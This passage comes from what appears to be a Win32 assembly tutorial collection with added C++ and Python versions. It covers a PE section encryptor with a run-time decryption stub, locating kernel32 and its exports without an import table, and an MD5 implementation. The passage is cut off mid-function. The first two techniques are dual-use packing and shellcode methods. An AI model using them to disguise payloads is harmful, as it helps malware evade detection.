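        if (s.name.compare(0, 4, k) == 0) return false;
    return true;
}

// Encrypt every eligible section in place and set IMAGE_SCN_MEM_WRITE
// (0x80000000) in its header, because the stub decrypts those pages at run
// time. Returns how many sections were transformed.
size_t encryptSections(Image& img, uint8_t key) {
    size_t count = 0;
    for (const Section& s : parseSections(img)) {
        if (!shouldEncrypt(s) || size_t(s.pointerToRawData) + s.sizeOfRawData > img.size()) continue;
        rollingKey(&img[s.pointerToRawData], s.sizeOfRawData, key, true);
        wr32(img, s.headerOffset + 0x24, s.characteristics | 0x80000000u);
        ++count;
    }
    return count;
}

// Constructed sample: a two-section PE32 with FileAlignment 0x200 and
// SectionAlignment 0x1000. Only the fields this example reads are filled in.
Image buildSamplePe() {
    const uint32_t peOff = 0x40, optSize = 0xE0;
    Image img(0x600, 0);
    wr16(img, 0, 0x5A4D);
    wr32(img, 0x3C, peOff);
    wr32(img, peOff, 0x00004550);
    wr16(img, peOff + 6, 2);                  // NumberOfSections
    wr16(img, peOff + 0x14, optSize);         // SizeOfOptionalHeader
    size_t opt = peOff + 0x18;
    wr16(img, opt, 0x10B);                    // PE32 magic
    wr32(img, opt + 0x20, 0x1000);            // SectionAlignment
    wr32(img, opt + 0x24, 0x200);             // FileAlignment
    wr32(img, opt + 0x3C, 0x200);             // SizeOfHeaders
    size_t t = opt + optSize;                 // section table
    std::memcpy(&img[t], ".text\0\0\0", 8);
    wr32(img, t + 0x08, 0x100); wr32(img, t + 0x0C, 0x1000);   // VirtualSize, VirtualAddress
    wr32(img, t + 0x10, 0x200); wr32(img, t + 0x14, 0x200);    // SizeOfRawData, PointerToRawData
    wr32(img, t + 0x24, 0x60000020);          // CODE | EXECUTE | READ
    std::memcpy(&img[t + 0x28], ".rdata\0\0", 8);
    wr32(img, t + 0x30, 0x40);  wr32(img, t + 0x34, 0x2000);
    wr32(img, t + 0x38, 0x200); wr32(img, t + 0x3C, 0x400);
    wr32(img, t + 0x4C, 0x40000040);          // INITIALIZED_DATA | READ
    for (size_t i = 0; i < 0x100; ++i) img[0x200 + i] = uint8_t(i * 7);   // stand-in code bytes
    std::memcpy(&img[0x400], "const data", 10);
    return img;
}

// Encrypt the sample, then undo it the way the stub would. Returns the number
// of sections encrypted, or -1 if .text was left unchanged, .rdata was touched,
// the write bit was not set, or the round trip did not restore the original.
int demoRoundTrip() {
    Image img = buildSamplePe(), orig = img;
    int n = int(encryptSections(img, 0x5A));
    if (img[0x200] == orig[0x200]) return -1;
    if (std::memcmp(&img[0x400], &orig[0x400], 0x200) != 0) return -1;
    if (parseSections(img)[0].characteristics != 0xE0000020u) return -1;
    rollingKey(&img[0x200], 0x100, 0x5A, false);
    return std::memcmp(&img[0x200], &orig[0x200], 0x100) == 0 ? n : -1;
}
```

Two things worth noticing from the code rather than the assembly: the transform is a fixed 256-byte keystream offset by a single key byte, so one known plaintext byte (and a PE .text section has many) recovers the key, and a section that is only marked writable still needs the new section's SizeOfImage and entry point patched as the cryptor does, otherwise the loader never reaches the stub.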
  4. Get kernel ImageBase

This is a small example of how to get the ImageBase of Kernel32.dll and how to get the addresses of the kernel's LoadLibrary and GetProcAddress functions without any APIs! I tested this code on Win98SE and Win2k. For any comments or bug reports drop a line to yoda_f2f@gmx.net. Happy New Year!
yoda

.386
.model flat,stdcall
option casemap:none

INCLUDE \masm32\include\windows.inc
INCLUDE \masm32\include\comdlg32.inc
INCLUDELIB \masm32\lib\comdlg32.lib

; ------ STRUCTS ------
sSEH STRUCT
    OrgEsp  DD ?
    OrgEbp  DD ?
    SaveEip DD ?
sSEH ENDS

; ------ EQU'S ------
MIN_KERNEL_SEARCH_BASE EQU 070000000h
MAX_API_STRING_LENGTH  EQU 150

; ------ CONST ------
.CONST
szLoadLibrary    DB "LoadLibraryA",0
szGetProcAddress DB "GetProcAddress",0
szExitProcess    DB "ExitProcess",0
szUser32         DB "user32",0
szMessageBox     DB "MessageBoxA",0
szwsprintf       DB "wsprintfA",0
szInfoCap        DB "- Kernel -",0
szInfoText       DB "The following information were obtained",13,10
                 DB "without the help of an Import Table !",13,10
                 DB 13,10
                 DB "Kernel32.dll ImageBase: 0x%08lX",13,10
                 DB "User32.dll ImageBase: 0x%08lX",13,10
                 DB 13,10
                 DB "API Addresses:",13,10
                 DB "LoadLibraryA: 0x%08lX",13,10
                 DB "GetProcAddress: 0x%08lX",13,10
                 DB "ExitProcess: 0x%08lX",13,10
                 DB 13,10
                 DB "MessageBoxA: 0x%08lX",13,10
                 DB "wsprintfA: 0x%08lX",0

; ------ DATA ------
.DATA
_LoadLibrary    DD 0
_GetProcAddress DD 0
_ExitProcess    DD 0
_MessageBox     DD 0
_wsprintf       DD 0
cBuff           DB 200 DUP (0)
SEH             sSEH <0>
dwKernelBase    DD 0
dwUserBase      DD 0

; ------ CODE ------
.CODE
main:
    ASSUME FS : NOTHING
    ;INT 3

    ;---- GET ImageBase of kernel32.dll ----
    PUSH [ESP]                      ; return address into kernel32 = a pointer inside the module
    CALL GetKernelBase
    OR EAX, EAX
    JZ QUIT
    MOV dwKernelBase, EAX

    ;---- GET SOME KERNEL API ADDRESSES ----
    ;-> LoadLibraryA
    PUSH OFFSET szLoadLibrary
    PUSH dwKernelBase
    CALL GetProcAddr
    OR EAX, EAX
    JZ QUIT
    MOV _LoadLibrary, EAX
    ;-> GetProcAddress
    PUSH OFFSET szGetProcAddress
    PUSH dwKernelBase
    CALL GetProcAddr
    OR EAX, EAX
    JZ QUIT
    MOV _GetProcAddress, EAX
    ;-> ExitProcess
    PUSH OFFSET szExitProcess
    PUSH dwKernelBase
    CALL GetProcAddr
    OR EAX, EAX
    JZ QUIT
    MOV _ExitProcess, EAX

    ;---- LOAD USER32.DLL ----
    PUSH OFFSET szUser32
    CALL _LoadLibrary
    OR EAX, EAX
    JZ QUIT
    MOV dwUserBase, EAX

    ;---- GET SOME USER API ADDRESSES ----
    ;-> MessageBoxA
    PUSH OFFSET szMessageBox
    PUSH dwUserBase
    CALL GetProcAddr
    OR EAX, EAX
    JZ QUIT
    MOV _MessageBox, EAX
    ;-> wsprintfA
    PUSH OFFSET szwsprintf
    PUSH dwUserBase
    CALL GetProcAddr
    OR EAX, EAX
    JZ QUIT
    MOV _wsprintf, EAX

    ;---- BUILD AND SHOW THE INFORMATION MSG ----
    PUSH _wsprintf
    PUSH _MessageBox
    PUSH _ExitProcess
    PUSH _GetProcAddress
    PUSH _LoadLibrary
    PUSH dwUserBase
    PUSH dwKernelBase
    PUSH OFFSET szInfoText
    PUSH OFFSET cBuff
    CALL _wsprintf
    ADD ESP, (9 * SIZEOF(DWORD))    ; wsprintf is cdecl: caller cleans the stack
    PUSH MB_ICONINFORMATION OR MB_SYSTEMMODAL
    PUSH OFFSET szInfoCap
    PUSH OFFSET cBuff
    PUSH 0
    CALL _MessageBox

    ;---- EXIT ----
    CALL _ExitProcess
QUIT:
    RET                             ; exit to OS

    ;---- AN UNUSED IMPORT ----
    ; The Win32 Loader of Win2k (maybe also of WinNT) won't call the EntryPoint of files which don't
    ; have an Import Table
    ; So here's an unused Import to make MASM compile an Import Table.
    PUSH NULL
    CALL GetOpenFileName

; ------ ROUTINES ------

; returns NULL in the case of an error
GetKernelBase PROC USES EDI ESI, dwTopStack : DWORD
    ; install SEH frame (reads of unmapped pages land in SehHandler, which resumes at ExceptCont)
    PUSH OFFSET SehHandler
    PUSH FS:[0]
    MOV SEH.OrgEsp, ESP
    MOV SEH.OrgEbp, EBP
    MOV SEH.SaveEip, OFFSET ExceptCont
    MOV FS:[0], ESP

    ; start the search
    MOV EDI, dwTopStack
    AND EDI, 0FFFF0000h             ; wipe the LOWORD !
    .WHILE TRUE
        .IF WORD PTR [EDI] == IMAGE_DOS_SIGNATURE
            MOV ESI, EDI
            ADD ESI, [ESI+03Ch]
            .IF DWORD PTR [ESI] == IMAGE_NT_SIGNATURE
                .BREAK
            .ENDIF
        .ENDIF
ExceptCont:
        SUB EDI, 010000h            ; step down one allocation granularity
        .IF EDI < MIN_KERNEL_SEARCH_BASE
            MOV EDI, 0BFF70000h
            .BREAK
        .ENDIF
    .ENDW
    XCHG EAX, EDI

    ; shutdown SEH frame
    POP FS:[0]
    ADD ESP, 4
    RET
GetKernelBase ENDP

; returns address or NULL in the case of an error
GetProcAddr PROC USES ESI EDI ECX EBX EDX, dwDllBase : DWORD, szApi : LPSTR
    ; install SEH frame
    PUSH OFFSET SehHandler
    PUSH FS:[0]
    MOV SEH.OrgEsp, ESP
    MOV SEH.OrgEbp, EBP
    MOV SEH.SaveEip, OFFSET @@BadExit
    MOV FS:[0], ESP

    ; check PE Signature
    MOV ESI, dwDllBase
    CMP WORD PTR [ESI], IMAGE_DOS_SIGNATURE
    JNZ @@BadExit
    ADD ESI, [ESI+03Ch]
    CMP DWORD PTR [ESI], IMAGE_NT_SIGNATURE
    JNZ @@BadExit

    ; get the string length of the target Api
    MOV EDI, szApi
    MOV ECX, MAX_API_STRING_LENGTH
    XOR AL, AL
    REPNZ SCASB
    MOV ECX, EDI
    SUB ECX, szApi                  ; ECX -> Api string length (including the terminating zero)

    ; trace the export table
    MOV EDX, [ESI+078h]             ; EDX -> Export table (DataDirectory[0].VirtualAddress)
    ADD EDX, dwDllBase
    ASSUME EDX : PTR IMAGE_EXPORT_DIRECTORY
    MOV EBX, [EDX].AddressOfNames   ; EBX -> AddressOfNames array pointer
    ADD EBX, dwDllBase
    XOR EAX, EAX                    ; EAX AddressOfNames Index
    .REPEAT
        MOV EDI, [EBX]
        ADD EDI, dwDllBase
        MOV ESI, szApi
        PUSH ECX                    ; save the api string length
        REPZ CMPSB
        .IF ZERO?
            ADD ESP, 4
            .BREAK
        .ENDIF
        POP ECX
        ADD EBX, 4
        INC EAX
    .UNTIL EAX == [EDX].NumberOfNames

    ; did we find sth ?
    .IF EAX == [EDX].NumberOfNames
        JMP @@BadExit
    .ENDIF

    ; find the corresponding Ordinal
    MOV ESI, [EDX].AddressOfNameOrdinals
    ADD ESI, dwDllBase
    PUSH EDX                        ; save the export table pointer
    MOV EBX, 2
    XOR EDX, EDX
    MUL EBX
    POP EDX
    ADD EAX, ESI
    XOR ECX, ECX
    MOV WORD PTR CX, [EAX]          ; ECX -> Api Ordinal

    ; get the address of the api
    MOV EDI, [EDX].AddressOfFunctions
    XOR EDX, EDX
    MOV EBX, 4
    MOV EAX, ECX
    MUL EBX
    ADD EAX, dwDllBase
    ADD EAX, EDI
    MOV EAX, [EAX]
    ADD EAX, dwDllBase
    JMP @@ExitProc
    ASSUME EDX : NOTHING

@@BadExit:
    XOR EAX, EAX
@@ExitProc:
    ; shutdown SEH frame
    POP FS:[0]
    ADD ESP, 4
    RET
GetProcAddr ENDP

SehHandler PROC C pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD
    MOV EAX, pContext
    ASSUME EAX : PTR CONTEXT
    PUSH SEH.SaveEip
    POP [EAX].regEip
    PUSH SEH.OrgEsp
    POP [EAX].regEsp
    PUSH SEH.OrgEbp
    POP [EAX].regEbp
    MOV EAX, ExceptionContinueExecution
    RET
SehHandler ENDP

end main

Demonstrates how to search for and obtain the module base address of kernel32.dll and the addresses of the functions in it without using any API function. Tested on both Win98 and Win2k.

Download: http://win32assembly.online.fr/files/kernel.zip
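The two steps the MASM code performs, as an added example in C++ that is not code from the post: find a module base by stepping down 64 KiB at a time from an address known to lie inside it (what GetKernelBase does with the return address), then resolve an export by name from IMAGE_EXPORT_DIRECTORY (what GetProcAddr does). It runs over a constructed in-memory image: offsets into a byte vector stand in for virtual addresses, a bounds check stands in for the SEH frame that catches reads of unmapped pages, and the sample module's base, export names and function RVAs are assumptions chosen for the illustration.

```cpp
// Added example, not code from the original post: module-base search and
// export-by-name resolution over a constructed in-memory image. Offsets into
// `Memory` stand in for virtual addresses; bounds checks replace the SEH frame.
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

typedef std::vector<uint8_t> Memory;

static uint16_t rd16(const Memory& m, size_t o) { return uint16_t(m[o] | (m[o + 1] << 8)); }
static uint32_t rd32(const Memory& m, size_t o) { return rd16(m, o) | (uint32_t(rd16(m, o + 2)) << 16); }
static void wr16(Memory& m, size_t o, uint16_t v) { m[o] = uint8_t(v); m[o + 1] = uint8_t(v >> 8); }
static void wr32(Memory& m, size_t o, uint32_t v) { wr16(m, o, uint16_t(v)); wr16(m, o + 2, uint16_t(v >> 16)); }

// "MZ" at addr and "PE\0\0" at addr + e_lfanew, with every read bounds-checked.
static bool isModuleAt(const Memory& m, uint32_t addr) {
    if (size_t(addr) + 0x40 > m.size() || rd16(m, addr) != 0x5A4D) return false;
    size_t pe = size_t(addr) + rd32(m, addr + 0x3C);
    return pe + 0x18 <= m.size() && rd32(m, pe) == 0x00004550;
}

// GetKernelBase: clear the low 16 bits of a pointer inside the module, then
// step down one allocation granularity (64 KiB) per iteration. Returns -1 once
// the search would go below minAddr (the post's MIN_KERNEL_SEARCH_BASE).
long findModuleBase(const Memory& m, uint32_t fromAddr, uint32_t minAddr) {
    for (uint32_t a = fromAddr & 0xFFFF0000u; ; a -= 0x10000) {
        if (isModuleAt(m, a)) return long(a);
        if (a < minAddr + 0x10000) return -1;
    }
}

// GetProcAddr: DataDirectory[0] (export table) sits 0x78 bytes past the PE
// signature in a PE32 optional header. AddressOfNames is scanned linearly; the
// matching index selects an AddressOfNameOrdinals entry, which indexes
// AddressOfFunctions. Returns 0 when the name is absent or the image is bad.
uint32_t getProcAddr(const Memory& m, uint32_t base, const std::string& api) {
    if (!isModuleAt(m, base)) return 0;
    size_t pe = size_t(base) + rd32(m, base + 0x3C);
    uint32_t expRva = rd32(m, pe + 0x78);
    if (expRva == 0 || size_t(base) + expRva + 0x28 > m.size()) return 0;
    size_t exp = size_t(base) + expRva;
    uint32_t nFuncs = rd32(m, exp + 0x14), nNames = rd32(m, exp + 0x18);
    size_t funcs = base + rd32(m, exp + 0x1C), names = base + rd32(m, exp + 0x20), ords = base + rd32(m, exp + 0x24);
    for (uint32_t i = 0; i < nNames; ++i) {
        if (names + 4 * i + 4 > m.size() || ords + 2 * i + 2 > m.size()) return 0;
        size_t nameAt = base + rd32(m, names + 4 * i);
        if (nameAt + api.size() + 1 > m.size()) return 0;
        if (std::memcmp(&m[nameAt], api.c_str(), api.size() + 1) != 0) continue;  // compare incl. NUL, like REPZ CMPSB
        uint16_t ord = rd16(m, ords + 2 * i);   // unbiased: indexes AddressOfFunctions directly
        if (ord >= nFuncs || funcs + 4 * ord + 4 > m.size()) return 0;
        return base + rd32(m, funcs + 4 * ord);
    }
    return 0;
}

// Constructed sample: a 192 KiB "address space" holding one module at 0x10000
// that exports three names (sorted, as a real export table is). The function
// RVAs are arbitrary values chosen for the illustration.
Memory buildSampleMemory() {
    const uint32_t base = 0x10000, peOff = 0x80, expRva = 0x200;
    Memory m(0x30000, 0);
    wr16(m, base, 0x5A4D);
    wr32(m, base + 0x3C, peOff);
    size_t pe = base + peOff;
    wr32(m, pe, 0x00004550);
    wr16(m, pe + 0x14, 0xE0);                 // SizeOfOptionalHeader
    wr16(m, pe + 0x18, 0x10B);                // PE32 magic
    wr32(m, pe + 0x78, expRva);               // DataDirectory[0].VirtualAddress
    wr32(m, pe + 0x7C, 0x200);                // DataDirectory[0].Size
    size_t exp = base + expRva;
    wr32(m, exp + 0x14, 3);                   // NumberOfFunctions
    wr32(m, exp + 0x18, 3);                   // NumberOfNames
    wr32(m, exp + 0x1C, 0x300);               // AddressOfFunctions
    wr32(m, exp + 0x20, 0x310);               // AddressOfNames
    wr32(m, exp + 0x24, 0x320);               // AddressOfNameOrdinals
    const uint32_t funcRva[3] = {0x1000, 0x1100, 0x1200};
    const char* const name[3] = {"ExitProcess", "GetProcAddress", "LoadLibraryA"};
    const uint16_t ordinal[3] = {2, 1, 0};    // ExitProcess->func[2], GetProcAddress->func[1], LoadLibraryA->func[0]
    for (int i = 0; i < 3; ++i) {
        wr32(m, base + 0x300 + 4 * i, funcRva[i]);
        wr32(m, base + 0x310 + 4 * i, 0x340 + 0x10 * i);
        wr16(m, base + 0x320 + 2 * i, ordinal[i]);
        std::memcpy(&m[base + 0x340 + 0x10 * i], name[i], std::strlen(name[i]) + 1);
    }
    return m;
}

// Mirrors main in the post: locate the module from an address inside it
// (0x2ABCD here stands in for the return address), then resolve one export.
uint32_t resolveFromSample(const char* api) {
    Memory m = buildSampleMemory();
    long base = findModuleBase(m, 0x2ABCD, 0x10000);
    return base < 0 ? 0 : getProcAddr(m, uint32_t(base), api);
}
```

The name table of a real export directory is sorted, so a binary search would replace the linear scan; the post's linear REPZ CMPSB loop is kept here because it is what the assembly does. On systems newer than the ones the post targets, the return address at the entry point is no longer inside kernel32 and the base is read from the PEB loader list instead, but the export-directory walk is unchanged.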
  5. MD5 Algorithm

;____________________________________________________________________________________________________________________________
; MD5hash : hashes a string using the md5 algorithm
;¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
; input :
;   ptBuffer: pointer to the string buffer (doesn't have to be zero-terminated; it is padded in place,
;             so it must have room for dtBufferLength + 9 bytes rounded up to a multiple of 64)
;   dtBufferLength: length of the buffer
;   ptMD5Result: pointer to a MD5RESULT structure
; output :
;   ptMD5Result: contains the hash dwords in dtA, dtB, dtC, dtD
;____________________________________________________________________________________________________________________________
; roy|fleur
;¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
MD5hash proto :dword,:dword,:dword

MD5RESULT STRUCT
    dtA dd ?
    dtB dd ?
    dtC dd ?
    dtD dd ?
MD5RESULT ENDS

FF MACRO dta,dtb,dtc,dtd,x,s,t
    ; a = b + ((a + F(b,c,d) + x + t) <<< s)   (<<< = rotate left)
    mov eax,dtb
    mov ebx,dtc
    mov ecx,dtd
    ; F(x,y,z) = (x and y) or ((not x) and z)
    and ebx,eax
    not eax
    and eax,ecx
    or eax,ebx
    add eax,dta
    add eax,x
    add eax,t
    mov cl,s
    rol eax,cl
    add eax,dtb
    mov dta,eax
ENDM

GG MACRO dta,dtb,dtc,dtd,x,s,t
    ; a = b + ((a + G(b,c,d) + x + t) <<< s)
    mov eax,dtb
    mov ebx,dtc
    mov ecx,dtd
    ; G(x,y,z) = (x and z) or (y and (not z))
    and eax,ecx
    not ecx
    and ecx,ebx
    or eax,ecx
    add eax,dta
    add eax,x
    add eax,t
    mov cl,s
    rol eax,cl
    add eax,dtb
    mov dta,eax
ENDM

HH MACRO dta,dtb,dtc,dtd,x,s,t
    ; a = b + ((a + H(b,c,d) + x + t) <<< s)
    mov eax,dtb
    mov ebx,dtc
    mov ecx,dtd
    ; H(x,y,z) = x xor y xor z
    xor eax,ebx
    xor eax,ecx
    add eax,dta
    add eax,x
    add eax,t
    mov cl,s
    rol eax,cl
    add eax,dtb
    mov dta,eax
ENDM

II MACRO dta,dtb,dtc,dtd,x,s,t
    ; a = b + ((a + I(b,c,d) + x + t) <<< s)
    mov eax,dtb
    mov ebx,dtc
    mov ecx,dtd
    ; I(x,y,z) = y xor (x or (not z))
    not ecx
    or eax,ecx
    xor eax,ebx
    add eax,dta
    add eax,x
    add eax,t
    mov cl,s
    rol eax,cl
    add eax,dtb
    mov dta,eax
ENDM

.code
MD5hash proc uses eax ebx ecx edx edi esi,ptBuffer:dword,dtBufferLength:dword,ptMD5Result:dword
    local dta:dword,dtb:dword,dtc:dword,dtd:dword

    ; phase I · padding
    ; append 80h, then zeros up to 8 bytes before the next 64-byte boundary,
    ; then the message length in bits as a little-endian qword
    mov edi,ptBuffer
    mov eax,dtBufferLength
    inc eax
    add edi,eax
    mov byte ptr [edi-1],080h
    xor edx,edx
    mov ebx,64
    div ebx                     ; edx = (length + 1) mod 64
    neg edx
    add edx,64                  ; edx = bytes left to the block boundary
    cmp edx,8
    jae @f
    add edx,64                  ; not enough room for the length: one more block
@@:
    mov ecx,edx
    xor al,al
    rep stosb                   ; zero fill (the last 8 bytes are overwritten below)
    mov eax,dtBufferLength
    inc edx
    add dtBufferLength,edx      ; padded length, a multiple of 64
    xor edx,edx
    mov ebx,8
    mul ebx                     ; edx:eax = length in bits
    mov dword ptr [edi-8],eax
    mov dword ptr [edi-4],edx
    mov edx,dtBufferLength
    mov edi,ptBuffer

    ; phase II · chaining variables initialization
    mov esi,ptMD5Result
    assume esi:ptr MD5RESULT
    mov [esi].dtA,067452301h
    mov [esi].dtB,0efcdab89h
    mov [esi].dtC,098badcfeh
    mov [esi].dtD,010325476h

    ; phase III · hashing, one 64-byte block per pass
hashloop:
    mov eax,[esi].dtA
    mov dta,eax
    mov eax,[esi].dtB
    mov dtb,eax
    mov eax,[esi].dtC
    mov dtc,eax
    mov eax,[esi].dtD
    mov dtd,eax

    ; round 1
    FF dta,dtb,dtc,dtd,dword ptr [edi+00*4],07,0d76aa478h
    FF dtd,dta,dtb,dtc,dword ptr [edi+01*4],12,0e8c7b756h
    FF dtc,dtd,dta,dtb,dword ptr [edi+02*4],17,0242070dbh
    FF dtb,dtc,dtd,dta,dword ptr [edi+03*4],22,0c1bdceeeh
    FF dta,dtb,dtc,dtd,dword ptr [edi+04*4],07,0f57c0fafh
    FF dtd,dta,dtb,dtc,dword ptr [edi+05*4],12,04787c62ah
    FF dtc,dtd,dta,dtb,dword ptr [edi+06*4],17,0a8304613h
    FF dtb,dtc,dtd,dta,dword ptr [edi+07*4],22,0fd469501h
    FF dta,dtb,dtc,dtd,dword ptr [edi+08*4],07,0698098d8h
    FF dtd,dta,dtb,dtc,dword ptr [edi+09*4],12,08b44f7afh
    FF dtc,dtd,dta,dtb,dword ptr [edi+10*4],17,0ffff5bb1h
    FF dtb,dtc,dtd,dta,dword ptr [edi+11*4],22,0895cd7beh
    FF dta,dtb,dtc,dtd,dword ptr [edi+12*4],07,06b901122h
    FF dtd,dta,dtb,dtc,dword ptr [edi+13*4],12,0fd987193h
    FF dtc,dtd,dta,dtb,dword ptr [edi+14*4],17,0a679438eh
    FF dtb,dtc,dtd,dta,dword ptr [edi+15*4],22,049b40821h

    ; round 2
    GG dta,dtb,dtc,dtd,dword ptr [edi+01*4],05,0f61e2562h
    GG dtd,dta,dtb,dtc,dword ptr [edi+06*4],09,0c040b340h
    GG dtc,dtd,dta,dtb,dword ptr [edi+11*4],14,0265e5a51h
    GG dtb,dtc,dtd,dta,dword ptr [edi+00*4],20,0e9b6c7aah
    GG dta,dtb,dtc,dtd,dword ptr [edi+05*4],05,0d62f105dh
    GG dtd,dta,dtb,dtc,dword ptr [edi+10*4],09,002441453h
    GG dtc,dtd,dta,dtb,dword ptr [edi+15*4],14,0d8a1e681h
    GG dtb,dtc,dtd,dta,dword ptr [edi+04*4],20,0e7d3fbc8h
    GG dta,dtb,dtc,dtd,dword ptr [edi+09*4],05,021e1cde6h
    GG dtd,dta,dtb,dtc,dword ptr [edi+14*4],09,0c33707d6h
    GG dtc,dtd,dta,dtb,dword ptr [edi+03*4],14,0f4d50d87h
    GG dtb,dtc,dtd,dta,dword ptr [edi+08*4],20,0455a14edh
    GG dta,dtb,dtc,dtd,dword ptr [edi+13*4],05,0a9e3e905h
    GG dtd,dta,dtb,dtc,dword ptr [edi+02*4],09,0fcefa3f8h
    GG dtc,dtd,dta,dtb,dword ptr [edi+07*4],14,0676f02d9h
    GG dtb,dtc,dtd,dta,dword ptr [edi+12*4],20,08d2a4c8ah

    ; round 3
    HH dta,dtb,dtc,dtd,dword ptr [edi+05*4],04,0fffa3942h
    HH dtd,dta,dtb,dtc,dword ptr [edi+08*4],11,08771f681h
    HH dtc,dtd,dta,dtb,dword ptr [edi+11*4],16,06d9d6122h
    HH dtb,dtc,dtd,dta,dword ptr [edi+14*4],23,0fde5380ch
    HH dta,dtb,dtc,dtd,dword ptr [edi+01*4],04,0a4beea44h
    HH dtd,dta,dtb,dtc,dword ptr [edi+04*4],11,04bdecfa9h
    HH dtc,dtd,dta,dtb,dword ptr [edi+07*4],16,0f6bb4b60h
    HH dtb,dtc,dtd,dta,dword ptr [edi+10*4],23,0bebfbc70h
    HH dta,dtb,dtc,dtd,dword ptr [edi+13*4],04,0289b7ec6h
    HH dtd,dta,dtb,dtc,dword ptr [edi+00*4],11,0eaa127fah
    HH dtc,dtd,dta,dtb,dword ptr [edi+03*4],16,0d4ef3085h
    HH dtb,dtc,dtd,dta,dword ptr [edi+06*4],23,004881d05h
    HH dta,dtb,dtc,dtd,dword ptr [edi+09*4],04,0d9d4d039h
    HH dtd,dta,dtb,dtc,dword ptr [edi+12*4],11,0e6db99e5h
    HH dtc,dtd,dta,dtb,dword ptr [edi+15*4],16,01fa27cf8h
    HH dtb,dtc,dtd,dta,dword ptr [edi+02*4],23,0c4ac5665h

    ; round 4
    II dta,dtb,dtc,dtd,dword ptr [edi+00*4],06,0f4292244h
    II dtd,dta,dtb,dtc,dword ptr [edi+07*4],10,0432aff97h
    II dtc,dtd,dta,dtb,dword ptr [edi+14*4],15,0ab9423a7h
    II dtb,dtc,dtd,dta,dword ptr [edi+05*4],21,0fc93a039h
    II dta,dtb,dtc,dtd,dword ptr [edi+12*4],06,0655b59c3h
    II dtd,dta,dtb,dtc,dword ptr [edi+03*4],10,08f0ccc92h
    II dtc,dtd,dta,dtb,dword ptr [edi+10*4],15,0ffeff47dh
    II dtb,dtc,dtd,dta,dword ptr [edi+01*4],21,085845dd1h
    II dta,dtb,dtc,dtd,dword ptr [edi+08*4],06,06fa87e4fh
    II dtd,dta,dtb,dtc,dword ptr [edi+15*4],10,0fe2ce6e0h
    II dtc,dtd,dta,dtb,dword ptr [edi+06*4],15,0a3014314h
    II dtb,dtc,dtd,dta,dword ptr [edi+13*4],21,04e0811a1h
    II dta,dtb,dtc,dtd,dword ptr [edi+04*4],06,0f7537e82h
    II dtd,dta,dtb,dtc,dword ptr [edi+11*4],10,0bd3af235h
    II dtc,dtd,dta,dtb,dword ptr [edi+02*4],15,02ad7d2bbh
    II dtb,dtc,dtd,dta,dword ptr [edi+09*4],21,0eb86d391h

    ; add this block's result to the chaining variables
    mov eax,dta
    add [esi].dtA,eax
    mov eax,dtb
    add [esi].dtB,eax
    mov eax,dtc
    add [esi].dtC,eax
    mov eax,dtd
    add [esi].dtD,eax
    add edi,64
    sub edx,64
    jnz hashloop

    ; phase IV · results
    ; byte-swap each dword so the four words print as the usual hex digest
    mov ecx,4
@@:
    mov eax,dword ptr [esi]
    xchg al,ah
    rol eax,16
    xchg al,ah
    mov dword ptr [esi],eax
    add esi,4
    loop @b
    ret
MD5hash endp

Download: http://win32assembly.online.fr/files/md5asm.zip
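Added example, not the roy|fleur code above: a pure-Python MD5 laid out in the same four phases as MD5hash (padding, chaining-variable init, 64-step compression per 64-byte block, byte swap of the result), so each phase of the assembly can be checked against it; the result is compared with hashlib in the same run. The test inputs are the RFC 1321 test vectors plus constructed messages around the padding boundaries.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF

# Per-step rotate amounts (the s operand of FF/GG/HH/II) and additive
# constants (the t operand), in the order of the 64 macro invocations above.
S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
T = [
    0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee, 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501,
    0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821,
    0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
    0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a,
    0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70,
    0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05, 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665,
    0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1,
    0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391,
]


def rotl(x, n):
    """32-bit rotate left, the `rol eax,cl` of the macros."""
    return ((x << n) | (x >> (32 - n))) & MASK


def md5_pad(msg):
    """Phase I: append 0x80, zero-fill so that exactly 8 bytes remain before
    the next 64-byte boundary, then the bit length as a little-endian qword."""
    padded = msg + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    return padded + struct.pack("<Q", (len(msg) * 8) & 0xFFFFFFFFFFFFFFFF)


def md5_state(msg):
    """Phases II and III: returns (A, B, C, D) as MD5RESULT holds them
    before the final byte swap."""
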